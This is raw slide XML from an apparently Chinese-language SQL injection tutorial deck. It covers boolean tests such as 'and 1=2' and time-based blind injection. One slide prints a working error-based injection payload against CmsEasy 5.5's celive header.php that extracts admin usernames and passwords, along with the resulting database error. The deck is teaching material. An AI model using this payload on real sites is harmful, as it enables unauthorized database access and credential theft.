      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="Shape 199"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1096962" y="2628900"/>
            <a:ext cx="7877099"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C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>http://www.sysorem.xyz/test.php?id=2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="Shape 200"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1065287" y="3349623"/>
            <a:ext cx="392414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执行的sql语句为：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Shape 201"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1120964" y="4159248"/>
            <a:ext cx="102104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C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SELECT title, description, body FROM items WHERE ID = 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202" name="Shape 202"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1058862" y="4879973"/>
            <a:ext cx="679490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如果攻击者构造如下的payload：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="Shape 203"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1077912" y="5780086"/>
            <a:ext cx="97292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C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>http://www.sysorem.xyz/test.php?id=2 and 1=2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="Shape 204"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1065287" y="6589711"/>
            <a:ext cx="392414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执行的sql语句为：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Shape 205"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1009650" y="7488236"/>
            <a:ext cx="1175385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C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SELECT title, description, body FROM items WHERE ID = 2 and 1=2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206" name="Shape 206"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1058862" y="4879973"/>
            <a:ext cx="679490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如果攻击者构造如下的payload：</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1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lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="22" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="26" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="30" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="34" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="38" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="42" fill="hold"/>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2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="204" grpId="9"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="205" grpId="10"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="197" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="199" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="203" grpId="8"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="202" grpId="6"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="206" grpId="7"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="201" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="200" grpId="4"/>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846136" y="3282155"/>
            <a:ext cx="11310940" cy="318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Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>因为“and 1=2”永远是一个假命题，所以这条sql语句的“and”条件永远无法成立，所以攻击者看到的页面结果为空，或者是一个出错的页面。</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为了进一步确认注入的存在，必须验证这个过程。</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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="919161" y="3059111"/>
            <a:ext cx="58805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Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>攻击者构造如下的payload：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="Shape 211"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="917574" y="4037011"/>
            <a:ext cx="97292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C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>http://www.sysorem.xyz/test.php?id=2 and 1=1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="Shape 212"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900111" y="4806155"/>
            <a:ext cx="11744328"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如果攻击者构造条件“and 1=1”时，返回正常了，说明sql语句的“and”成功执行，可以判断参数“id”，存在sql注入漏洞。</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10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="499" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="210"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="499" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="211"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21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12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="212"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="212" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="211" grpId="2"/>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3820159" y="679449"/>
            <a:ext cx="4677093"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latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Timebased Blind</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Shape 215"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="672473" y="1688306"/>
            <a:ext cx="2477643"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Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>下面举个例子：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Shape 216"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1250950" y="2216149"/>
            <a:ext cx="5535403"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500">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>漏洞复现环境：CmsEasy_5.5_UTF-8  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="Shape 217"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1181100" y="3169442"/>
            <a:ext cx="146039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500">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>利用过程：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218" name="Shape 218"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1212850" y="3708399"/>
            <a:ext cx="10579101"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00">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>http://www.sysorem.xyz/002/celive/live/header.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr sz="2300">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>此处演示是把服务器搭在虚拟机，地址为http://10.211.55.34</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr sz="2300">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>POST:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr sz="2300">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>xajax=LiveMessage&amp;xajaxargs[0][name]=1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(select concat(username,0x23,password) from cmseasy_user where groupid=2 limit 1))a from information_schema.tables group by a)b),’’,'','','1','**.**.**.**','2')#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219" name="Shape 219"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1212850" y="6781799"/>
            <a:ext cx="10579101" cy="309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300">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>返回：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr sz="2300">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Incorrect integer value: 'A' for column 'departmentid' at row 1&lt;br /&gt;&lt;br /&gt;INSERT INTO `cmseasy_chat` (`sessionid`,`name`,`email`,`phone`,`departmentid`,`message`,`timestamp`,`ip`,`status`) VALUES(‘6','A','A','A','A','A','1466856041','10.211.55.2','2')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr sz="2300">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr sz="2300">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>以上的方式可以认为是基于报错的注入，从返回的信息一目了然。我们知道了表的信息。</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14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="214"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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215"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="215"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0" fmla="#ppt_w*sin(2.5*pi*$)">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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216"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="216"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0" fmla="#ppt_w*sin(2.5*pi*$)">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21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el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="217"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="217"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0" fmla="#ppt_w*sin(2.5*pi*$)">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21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5" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="30" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="218"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="218"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0" fmla="#ppt_w*sin(2.5*pi*$)">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="218"/>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0" presetID="19" grpId="6" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="219"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="1500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="219"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0" fmla="#ppt_w*sin(2.5*pi*$)">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="1500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="217" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="218" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="219" grpId="6"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="214" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="215" grpId="2"/>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image22.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165340" y="380709"/>
            <a:ext cx="10674120" cy="6845469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="222" name="Shape 222"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="962570" y="7956549"/>
            <a:ext cx="114682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atin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>上面的例子为典型的使用 group by 的报错，假设此时不能通过上面报错来拿到结果或者就是说上面没有报错信息的回显亦或程序已经将报错信息“友好化”我们无法得到错误细节。那么我们可以尝试通过时间的长短来判断命令是否执行。</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21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="221"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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222"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="13"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2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="221"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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1054035" y="590549"/>
            <a:ext cx="11147853" cy="190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Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
